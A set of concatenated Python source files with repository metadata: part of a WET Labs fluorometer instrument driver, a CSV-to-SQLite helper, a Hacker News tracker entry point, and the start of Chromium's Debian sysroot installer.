@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentProtocolException if the update commands and not recognized.
"""
if self._init_type != InitializationType.NONE:
response = self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
response = self._do_cmd_resp(InstrumentCommand.PRINT_METADATA, timeout=TIMEOUT,
response_regex=MET_REGEX_MATCHER)
self._param_dict.update(response)
self._init_params()
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
def _handler_command_get(self, *args, **kwargs):
"""
Get commands
"""
next_state, result = self._handler_get(*args, **kwargs)
# TODO match the return signature of other handlers - next_state, (next_state, result)
return next_state, result
def _handler_command_set(self, *args, **kwargs):
"""
Set commands
"""
next_state = None
result = []
try:
params = args[0]
log.debug('Params = %s', params)
except IndexError:
raise InstrumentParameterException('_handler_command_set Set command requires a parameter dict.')
try:
startup = args[1]
except IndexError:
startup = False
log.debug("NO STARTUP VALUE")
pass
if not isinstance(params, dict):
raise InstrumentParameterException('Set parameters not a dict.')
# For each key, val in the dict, issue set command to device.
# Raise if the command not understood.
else:
self._set_params(params, startup)
return next_state, result
@staticmethod
def _handler_command_exit(*args, **kwargs):
"""
Exit command state.
"""
pass
def _handler_command_acquire_sample(self, *args, **kwargs):
"""
Get one sample from the instrument
"""
next_state = None
timeout = time.time() + SAMPLE_TIMEOUT
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
sample_particle_class = DataParticleType.FLORTD_SAMPLE
else:
sample_particle_class = DataParticleType.FLORDD_SAMPLE
particles = self.wait_for_particles([sample_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_command_start_autosample(self, *args, **kwargs):
"""
Switch into autosample mode. ($run)
"""
next_state = ProtocolState.AUTOSAMPLE
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
def _handler_command_acquire_status(self, *args, **kwargs):
"""
Run the $mnu Command (print menu)
"""
next_state = None
timeout = time.time() + STATUS_TIMEOUT
self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
status_particle_class = DataParticleType.FLORTD_MNU
else:
status_particle_class = DataParticleType.FLORDD_MNU
particles = self.wait_for_particles([status_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_command_run_wiper(self, *args, **kwargs):
"""
Issue the run wiper command ($mvs)
"""
next_state = None
result = self._do_cmd_resp(InstrumentCommand.RUN_WIPER, *args, timeout=TIMEOUT,
response_regex=RUN_REGEX_MATCHER)
return next_state, (next_state, [result])
def _handler_command_clock_sync(self, *args, **kwargs):
"""
Synchronize the clock
"""
next_state = None
result = []
self._sync_clock()
return next_state, (next_state, result)
########################################################################
# Autosample handlers.
########################################################################
def stop_scheduled_job(self, schedule_job):
"""
Remove the scheduled job
:param schedule_job:
"""
if self._scheduler is not None:
try:
self._remove_scheduler(schedule_job)
except KeyError:
log.debug("_remove_scheduler could not find %s", schedule_job)
def start_scheduled_job(self, param, schedule_job, protocol_event):
"""
Add a scheduled job
:param param:
:param schedule_job:
:param protocol_event:
"""
interval = self._param_dict.get(param).split(':')
hours = interval[0]
minutes = interval[1]
seconds = interval[2]
log.debug("Setting scheduled interval to: %s %s %s", hours, minutes, seconds)
config = {DriverConfigKey.SCHEDULER: {
schedule_job: {
DriverSchedulerConfigKey.TRIGGER: {
DriverSchedulerConfigKey.TRIGGER_TYPE: TriggerType.INTERVAL,
DriverSchedulerConfigKey.HOURS: int(hours),
DriverSchedulerConfigKey.MINUTES: int(minutes),
DriverSchedulerConfigKey.SECONDS: int(seconds)
}
}
}
}
self.set_init_params(config)
self._add_scheduler_event(schedule_job, protocol_event)
def _handler_autosample_enter(self, *args, **kwargs):
"""
Enter autosample state. configure and start the scheduled run wiper
@throws InstrumentTimeoutException if the device cannot be woken.
@throws InstrumentProtocolException if the update commands and not recognized.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
if self._init_type != InitializationType.NONE:
response = self._do_cmd_resp(InstrumentCommand.PRINT_MENU, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
# get the metadata once from the instrument
response = self._do_cmd_resp(InstrumentCommand.PRINT_METADATA, timeout=TIMEOUT,
response_regex=MET_REGEX_MATCHER)
self._param_dict.update(response)
self._init_params()
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, *args, timeout=TIMEOUT,
response_regex=resp_regex)
# Start scheduling for running the wiper and syncing the clock
log.debug("Configuring the scheduler to run wiper %s", self._param_dict.get(Parameter.RUN_WIPER_INTERVAL))
if self._param_dict.get(Parameter.RUN_WIPER_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_WIPER_INTERVAL, ScheduledJob.RUN_WIPER,
ProtocolEvent.RUN_WIPER_SCHEDULED)
log.debug("Configuring the scheduler to sync clock %s", self._param_dict.get(Parameter.RUN_CLOCK_SYNC_INTERVAL))
if self._param_dict.get(Parameter.RUN_CLOCK_SYNC_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_CLOCK_SYNC_INTERVAL, ScheduledJob.CLOCK_SYNC,
ProtocolEvent.SCHEDULED_CLOCK_SYNC)
log.debug("Configuring the scheduler to acquire status %s", self._param_dict.get(
Parameter.RUN_ACQUIRE_STATUS_INTERVAL))
if self._param_dict.get(Parameter.RUN_ACQUIRE_STATUS_INTERVAL) != '00:00:00':
self.start_scheduled_job(Parameter.RUN_ACQUIRE_STATUS_INTERVAL, ScheduledJob.ACQUIRE_STATUS,
ProtocolEvent.SCHEDULED_ACQUIRE_STATUS)
def _handler_autosample_stop_autosample(self, *args, **kwargs):
"""
Stop autosample and switch back to command mode.
@retval (next_state, result) tuple, (ProtocolState.COMMAND, None) if successful.
@throws InstrumentTimeoutException if device cannot be woken for command.
@throws InstrumentProtocolException if command misunderstood or incorrect prompt received.
"""
next_state = ProtocolState.COMMAND
# Stop scheduled run of wiper, clock sync, & acquire status
self.stop_scheduled_job(ScheduledJob.RUN_WIPER)
self.stop_scheduled_job(ScheduledJob.CLOCK_SYNC)
self.stop_scheduled_job(ScheduledJob.ACQUIRE_STATUS)
# Issue the stop command.
result = self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
return next_state, (next_state, [result])
def _handler_autosample_run_wiper(self, *args, **kwargs):
"""
Runs the wiper. Puts the instrument into command mode, sends the command. If wiper is run successfully,
put instrument back into autosample mode.
"""
next_state = None
# put instrument into command mode to send run wiper command ($mvs)
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, *args, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._do_cmd_resp(InstrumentCommand.RUN_WIPER, *args, timeout=TIMEOUT, response_regex=RUN_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
def _handler_autosample_acquire_status(self, *args, **kwargs):
"""
Get one sample from the instrument
"""
next_state = None
timeout = time.time() + STATUS_TIMEOUT
# put instrument into command mode to send command $run to collect status
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
self._do_cmd_no_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
if self.__instrument_class__ == FLORT_CLASS:
status_particle_class = DataParticleType.FLORTD_MNU
else:
status_particle_class = DataParticleType.FLORDD_MNU
particles = self.wait_for_particles([status_particle_class], timeout)
return next_state, (next_state, particles)
def _handler_autosample_clock_sync(self, *args, **kwargs):
"""
Syncs the clock. Puts the instrument in command mode, synchronizes the clock, then puts the instrument
back into autosample mode.
"""
next_state = None
self._do_cmd_resp(InstrumentCommand.INTERRUPT_INSTRUMENT, timeout=TIMEOUT, response_regex=MNU_REGEX_MATCHER)
self._sync_clock()
if self.__instrument_class__ == FLORT_CLASS:
resp_regex = FLORT_SAMPLE_REGEX_MATCHER
else:
resp_regex = FLORD_SAMPLE_REGEX_MATCHER
result = self._do_cmd_resp(InstrumentCommand.RUN_SETTINGS, timeout=TIMEOUT, response_regex=resp_regex)
return next_state, (next_state, [result])
@staticmethod
def _handler_autosample_exit(*args, **kwargs):
"""
Exit autosample state.
"""
pass
########################################################################
# Direct access handlers.
########################################################################
def _handler_direct_access_enter(self, *args, **kwargs):
"""
Enter direct access state.
"""
# Tell driver superclass to send a state change event.
# Superclass will query the state.
self._driver_event(DriverAsyncEvent.STATE_CHANGE)
self._sent_cmds = []
@staticmethod
def _handler_direct_access_exit(*args, **kwargs):
"""
Exit direct access state.
"""
pass
def _handler_direct_access_execute_direct(self, data):
"""
Execute Direct Access command(s)
"""
next_state = None
result = []
self._do_cmd_direct(data)
# add sent command to list for 'echo' filtering in callback
self._sent_cmds.append(data)
return next_state, (next_state, result)
def _handler_direct_access_stop_direct(self):
"""
Stop Direct Access, and put the driver into a healthy state by reverting itself back to the previous
state before starting Direct Access.
@throw InstrumentProtocolException on invalid command
"""
# update current state in case the direct access commands modified it
next_state, (_, result) = self._handler_unknown_discover()
return next_state, (next_state, result)
@staticmethod
def _handler_command_start_direct():
"""
Start direct access
"""
next_state = ProtocolState.DIRECT_ACCESS
result = []
return next_state, (next_state, result)
########################################################################
# Private helpers.
########################################################################
def _set_params(self, *args, **kwargs):
"""
Issue commands to the instrument to set various parameters
Also called when setting parameters during startup and direct access
"""
params = args[0]
self._verify_not_readonly(*args, **kwargs)
old_config = self._param_dict.get_config()
for (key, val) in params.iteritems():
log.debug("KEY = " + str(key) + " VALUE = " + str(val))
# if setting the clock or date, run clock sync command
if key in [Parameter.TIME, Parameter.DATE]:
self._sync_clock()
else:
# verify value being set is different than that stored
old_val = self._param_dict.format(key)
new_val = self._param_dict.format(key, params[key])
log.debug('KEY = %r, old = %r new %r', key, old_val, new_val)
if old_val != new_val:
# if setting the mvs interval/clock sync interval/acquire status interval/ instrument class,
# do not send a command
if key in [Parameter.RUN_WIPER_INTERVAL,
Parameter.RUN_CLOCK_SYNC_INTERVAL,
Parameter.RUN_ACQUIRE_STATUS_INTERVAL]:
self._param_dict.set_value(key, val)
# else perform regular command
else:
response = self._do_cmd_resp(InstrumentCommand.SET, key, val, response_regex=MNU_REGEX_MATCHER)
self._param_dict.update(response)
# Get new param dict config. If it differs from the old config,
# tell driver superclass to publish a config change event.
new_config = self._param_dict.get_config()
if not dict_equal(old_config, new_config, ignore_keys=Parameter.TIME):
self._driver_event(DriverAsyncEvent.CONFIG_CHANGE)
def _build_single_parameter_command(self, cmd, param, val):
"""
Build handler for set commands. param val followed by newline.
String val constructed by param dict formatting function.
@param param the parameter key to set.
@param val the parameter value to set.
@retval The set command to be sent to the device.
@throws InstrumentProtocolException if the parameter is not valid or if the formatting function could not
accept the value passed.
"""
try:
str_val = self._param_dict.format(param, val)
if str_val is None:
raise InstrumentParameterException("Driver PARAM was None!!!!")
# do extra formatting if one of these commands
if param == 'clk':
str_val = str_val.replace(":", "")
if param == 'dat':
str_val = str_val.replace("/", "")
set_cmd = '%s %s' % (param, str_val)
set_cmd += NEWLINE
set_cmd = '$' + set_cmd
except KeyError:
raise InstrumentParameterException('Unknown driver parameter %s' % param)
return set_cmd
@staticmethod
def _build_no_eol_command(cmd):
"""
Build handler for commands issued without eol. Primarily for the instrument interrupt command.
"""
return cmd
def _build_simple_command(self, cmd, *args):
"""
Build handler for basic commands.
@param cmd the simple command to format.
@retval The command to be sent to the device.
"""
return cmd + NEWLINE
def _got_chunk(self, chunk, timestamp):
"""
The base class got_data has gotten a chunk from the chunker. Pass it to extract_sample
with the appropriate particle objects and REGEXes.
"""
if self.__instrument_class__ == FLORT_CLASS:
log.trace("_got_chunk - Instrument class == flort")
if self._extract_sample(FlortMenuParticle, MNU_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlortDMNU_Particle")
elif self._extract_sample(FlortSampleParticle, FLORT_SAMPLE_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlortDSample_Particle")
else:
log.trace("_got_chunk - _param_dict == %s", str(self._param_dict))
if self._extract_sample(FlordMenuParticle, MNU_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlordDMNU_Particle")
elif self._extract_sample(FlordSampleParticle, FLORD_SAMPLE_REGEX_MATCHER, chunk, timestamp):
log.trace("_got_chunk - successful match for FlordDSample_Particle")
def _wakeup(self, timeout, delay=1):
"""
Override method: There is no wakeup for this instrument
"""
pass
def _sync_clock(self, time_format="%m%d%y %H:%M:%S"):
"""
Send the command to the instrument to synchronize the clock
@param time_format: time format string for set command
@raise: InstrumentProtocolException if command fails
"""
# clear out any past data so it doesnt confuse the command
self._linebuf = ''
self._promptbuf = ''
str_val = get_timestamp_delayed(time_format).split(" ")
date_val = str_val[0]
clock_val = str_val[1]
log.debug("Setting the clock to %s %s", clock_val, date_val)
self._do_cmd_resp(InstrumentCommand.SET, Parameter.TIME, clock_val, timeout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
self._do_cmd_resp(InstrumentCommand.SET, Parameter.DATE, date_val, timout=TIMEOUT,
response_regex=MNU_REGEX_MATCHER)
@staticmethod
def _float_to_string(v):
"""
Override base class method because it returns an exponential formatted float and that is not what is needed here
Write a float value to string formatted for set operations.
@param v A float val.
@retval a float string formatted for set operations.
@throws InstrumentParameterException if value is not a float.
"""
if not isinstance(v, float):
raise InstrumentParameterException('Value %s is not a float.' % v)
else:
return str(v)
def _int_to_string_inrange(self, v):
"""
Validate that integer is in range (between 1 and 255) before returning the string value
@param v An int value.
@retval a string representing the input (v) parameter
@throws InstrumentParameterException if value is not within the range.
"""
if v < 1 or v > 255:
raise InstrumentParameterException('Value %s must be between 1 and 255' % (v,))
else:
return self._int_to_string(v)
def _build_driver_dict(self):
"""
Populate the driver dictionary with options
"""
self._driver_dict.add(DriverDictKey.VENDOR_SW_COMPATIBLE, True)
def _build_command_dict(self):
"""
Populate the command dictionary with commands
"""
self._cmd_dict.add(Capability.RUN_WIPER, timeout=5, display_name="Run Wiper")
self._cmd_dict.add(Capability.CLOCK_SYNC, timeout=5, display_name='Synchronize Clock')
self._cmd_dict.add(Capability.ACQUIRE_SAMPLE, timeout=SAMPLE_TIMEOUT, display_name='Acquire Sample')
self._cmd_dict.add(Capability.START_AUTOSAMPLE, timeout=5, display_name='Start Autosample')
self._cmd_dict.add(Capability.STOP_AUTOSAMPLE, timeout=5, display_name='Stop Autosample')
self._cmd_dict.add(Capability.ACQUIRE_STATUS, timeout=STATUS_TIMEOUT, display_name='Acquire Status')
self._cmd_dict.add(Capability.DISCOVER, timeout=10, display_name='Discover')
def _build_param_dict(self):
"""
Populate the parameter dictionary with parameters. For each parameter key, add match string, match lambda
function, and value formatting function for set commands.
"""
# StatusData
self._param_dict.add(Parameter.SERIAL_NUM,
FlortMenuParticle.LINE01,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Serial Number",
description='Instrument serial number',
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.FIRMWARE_VERSION,
FlortMenuParticle.LINE02,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Firmware Version",
description='Firmware version',
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENTS_PER_REPORTED,
FlortMenuParticle.LINE03,
lambda match: int(match.group(1)),
self._int_to_string_inrange,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_WRITE,
display_name="Measurements per Reported Value",
description='Number of measurements for each reported value: (1 - 255)',
range=(1, 255),
default_value=1,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MEASUREMENTS_PER_PACKET,
FlortMenuParticle.LINE04,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Measurements per Packet",
description='Number of individual measurements in each packet. 0 is continuous operation.',
range=(0, 65535),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MEASUREMENT_1_DARK_COUNT,
FlortMenuParticle.LINE05,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 1 Dark Count",
description='Dark count value for 700nm scatter: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_2_DARK_COUNT,
FlortMenuParticle.LINE06,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 2 Dark Count",
description='Dark count value for chlorophyll concentration: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_3_DARK_COUNT,
FlortMenuParticle.LINE07,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 3 Dark Count",
description='Dark count value for CDOM concentration: (0 - 65535)',
range=(0, 65535),
default_value=None,
units=ParameterUnit.COUNTS,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_1_SLOPE,
FlortMenuParticle.LINE08,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 1 Slope Value",
description='Scale factor for 700nm scatter.',
default_value=None,
units=ParameterUnit.PART_PER_METER_STERADIAN,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_2_SLOPE,
FlortMenuParticle.LINE09,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 2 Slope Value",
description='Scale factor for chlorophyll concentration.',
default_value=None,
units=ParameterUnit.MICROGRAMS_PER_LITER,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.MEASUREMENT_3_SLOPE,
FlortMenuParticle.LINE10,
lambda match: float(match.group(1)),
self._float_to_string,
type=ParameterDictType.FLOAT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Measurement 3 Slope Value",
description='Scale factor for CDOM concentration.',
default_value=None,
units=ParameterUnit.PARTS_PER_MILLION,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.PREDEFINED_OUTPUT_SEQ,
FlortMenuParticle.LINE11,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Predefined Output Sequence",
description='Indicates which pre-defined output sequences to use when outputting data: (0 - 3)',
range=(0, 3),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.BAUD_RATE,
FlortMenuParticle.LINE12,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Baud Rate",
description='Baud rate for instrument communications: (2400 to 230400)',
range={'2400': 2400, '4800': 4800, '9600': 9600, '14400': 14400, '19200': 19200,
'19201': 19201, '28800': 28800, '38400': 38400, '57600': 57600, '115200': 115200,
'230400': 230400},
default_value=None,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.PACKETS_PER_SET,
FlortMenuParticle.LINE13,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Packets per Set",
description='Number of packets in a set (0 - 65535). 0 results in the stored configuration repeating continuously.',
range=(0, 65535),
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.RECORDING_MODE,
FlortMenuParticle.LINE14,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Recording Mode",
description='Enables (1) or disables (0) data recording to internal memory.',
range={'Disable': 0, 'Enable': 1},
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.MANUAL_MODE,
FlortMenuParticle.LINE15,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Manual Mode",
description='Enables (1) or disables (0) manual start time.',
range={'Disable': 0, 'Enable': 1},
default_value=0,
startup_param=True,
direct_access=True)
self._param_dict.add(Parameter.SAMPLING_INTERVAL,
FlortMenuParticle.LINE16,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Time Interval Between Packets",
default_value=None,
description='Time from the start of one packet to the start of the next packet in a set.',
units=ParameterUnit.TIME_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.DATE,
FlortMenuParticle.LINE17,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Date",
description='Date in the Real Time Clock.',
default_value=None,
units=ParameterUnit.DATE_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.TIME,
FlortMenuParticle.LINE18,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Time",
description='Time in the Real Time Clock.',
default_value=None,
startup_param=False,
units=ParameterUnit.TIME_INTERVAL,
direct_access=False)
self._param_dict.add(Parameter.MANUAL_START_TIME,
FlortMenuParticle.LINE19,
lambda match: match.group(1),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Manual Start Time",
description="Instrument will wait until this time to start sampling when powered.",
default_value=None,
units=ParameterUnit.TIME_INTERVAL,
startup_param=False,
direct_access=False)
self._param_dict.add(Parameter.INTERNAL_MEMORY,
FlortMenuParticle.LINE20,
lambda match: int(match.group(1)),
self._int_to_string,
type=ParameterDictType.INT,
expiration=None,
visibility=ParameterDictVisibility.READ_ONLY,
display_name="Internal Memory Size",
description='Amount of internal memory.',
range=(0, (1 << 16) - 1),
units=Units.BYTE,
default_value=None,
startup_param=False,
direct_access=False)
########################
# Engineering Parameters
########################
self._param_dict.add(Parameter.RUN_WIPER_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Run Wiper Interval",
default_value='00:00:00',
description='Time interval for running the wiper command.',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
self._param_dict.add(Parameter.RUN_CLOCK_SYNC_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Run Clock Sync Interval",
description='Time interval for running clock sync.',
default_value='00:00:00',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
self._param_dict.add(Parameter.RUN_ACQUIRE_STATUS_INTERVAL,
TIME_INTERVAL,
lambda match: match.group(0),
str,
type=ParameterDictType.STRING,
expiration=None,
visibility=ParameterDictVisibility.IMMUTABLE,
display_name="Acquire Status Interval",
description='Time interval for running acquiring status.',
default_value='00:00:00',
units=ParameterUnit.TIME_INTERVAL,
startup_param=True,
direct_access=False)
def create_playback_protocol(callback):
return Protocol(None, None, callback)
| petercable/mi-instrument | mi/instrument/wetlabs/fluorometer/flort_d/driver.py | Python | bsd-2-clause | 77,155 |
import csv
import os
import sys
import traceback
import sqlite3
import fnmatch
import decimal
import datetime
def valid_dt(dt):
try:
datetime.datetime.strptime(dt, "%m/%d/%Y")
return True
except:
return False
def adapt_decimal(d):
return str(d)
def convert_decimal(s):
return decimal.Decimal(s)
def db_cur(source = ":memory:"):
# Register the adapter
sqlite3.register_adapter(decimal.Decimal, adapt_decimal)
# Register the converter
sqlite3.register_converter("DECTEXT", convert_decimal)
conn = sqlite3.connect(source, detect_types=sqlite3.PARSE_DECLTYPES)
#conn.row_factory = sqlite3.Row
cur = conn.cursor()
return conn, cur
def question_marks(st):
question_marks = '?'
for i in range(0, len(st.split(','))-1):
question_marks = question_marks + ",?"
return question_marks
def create_tbl(cur, tbl_name, header, arr = [], index_arr = []):
cur.execute("""select count(*) FROM sqlite_master WHERE type='table' AND name = '%s' """ % (tbl_name))
tbl_exists = cur.fetchone()
if tbl_exists[0] == 0:
print "CREATE TABLE " + tbl_name + " (" + header.replace("id,", "id PRIMARY KEY,") + " );"
cur.execute("CREATE TABLE " + tbl_name + " (" + header.replace("id,", "id PRIMARY KEY,") + " );")
for index in index_arr:
cur.execute("CREATE INDEX " + tbl_name + "_" + index + " ON " + tbl_name + " (" + index + ");")
if arr != []:
cur.executemany("INSERT INTO " + tbl_name + " VALUES ("+question_marks(header)+")", arr)
return
def csv_to_arr(csv_file, start=1, has_header=True):
arr = []
with open(csv_file, 'rU') as f:
reader = csv.reader(f)
arr = list(reader)
arr = zip(*arr)
arr = [[(datetime.datetime.strptime(y, "%m/%d/%Y").date().strftime("%Y-%m-%d") if valid_dt(y) else y) for y in x] for x in arr if any(x)]
arr = zip(*arr)
header = ""
if has_header:
header = ','.join(arr[0])
arr = arr[start:]
return header, arr
else:
return arr[start:]
return
def arr_to_csv(file_name, header, data_arr):
csv_file = open(file_name, 'wb')
wr = csv.writer(csv_file, quoting=csv.QUOTE_ALL)
wr.writerow(header.split(','))
for data_row in data_arr:
line = []
for ele in data_row:
line.append(str(ele))
wr.writerow(line)
csv_file.close()
return
conn, cur = db_cur()
header, arr = csv_to_arr("tmp\\20160914.csv")
print arr[0]
| frederick623/wat | date_transform.py | Python | apache-2.0 | 2,296 |
import argparse
import logging
import helper
import puller
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-v', '--verbose',
help='increase logging verbosity',
action='store_true')
parser.add_argument('-c', '--conf', type=str,
help='configuration file for saver and api calls')
parser.add_argument('-l', '--log', type=str,
help='path for program log')
args = parser.parse_args()
# setting log level
if args.verbose:
log_level = logging.DEBUG
else:
log_level = logging.INFO
# setting log location
if args.log is not None:
logfile = args.log
else:
logfile = './hntracker.log'
# setting up log
logging.basicConfig(filename=logfile, level=log_level,
format='%(asctime)s %(message)s')
logger = logging.getLogger(__name__)
# checking if conf is present
if args.conf is None:
helper.fatal('no configuraton file set', logger)
api_caller = puller.HNCaller(args.conf, logger)
csv_saver = saver.HNSaver(args.conf, logger)
logger.info('beginning api call run')
run_api(api_caller, csv_saver)
logger.info('completed api call run')
# cleaning up log
logger.debug('closing log')
logger.close()
def run_api(caller, saver):
url = caller.construct_call()
stories = process_call(url)
csv_saver.save_csv(stories)
| jakubtuchol/HNTracker | src/__main__.py | Python | mit | 1,429 |
#!/usr/bin/env python
# Copyright (c) 2013 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Install Debian sysroots for building chromium.
"""
# The sysroot is needed to ensure that binaries will run on Debian Wheezy,
# the oldest supported linux distribution. For ARM64 linux, we have Debian
# Jessie sysroot as Jessie is the first version with ARM64 support. This script
# can be run manually but is more often run as part of gclient hooks. When run
# from hooks this script is a no-op on non-linux platforms.
# The sysroot image could be constructed from scratch based on the current
# state or Debian Wheezy/Jessie but for consistency we currently use a
# pre-built root image. The image will normally need to be rebuilt every time
# chrome's build dependencies are changed.
import hashlib
import json
import platform
import optparse
import os
import re
import shutil
import subprocess
import sys
import urllib2
SCRIPT_DIR = os.path.dirname(os.path.abspath(__file__))
sys.path.append(os.path.dirname(os.path.dirname(SCRIPT_DIR)))
import detect_host_arch
URL_PREFIX = 'https://commondatastorage.googleapis.com'
URL_PATH = 'chrome-linux-sysroot/toolchain'
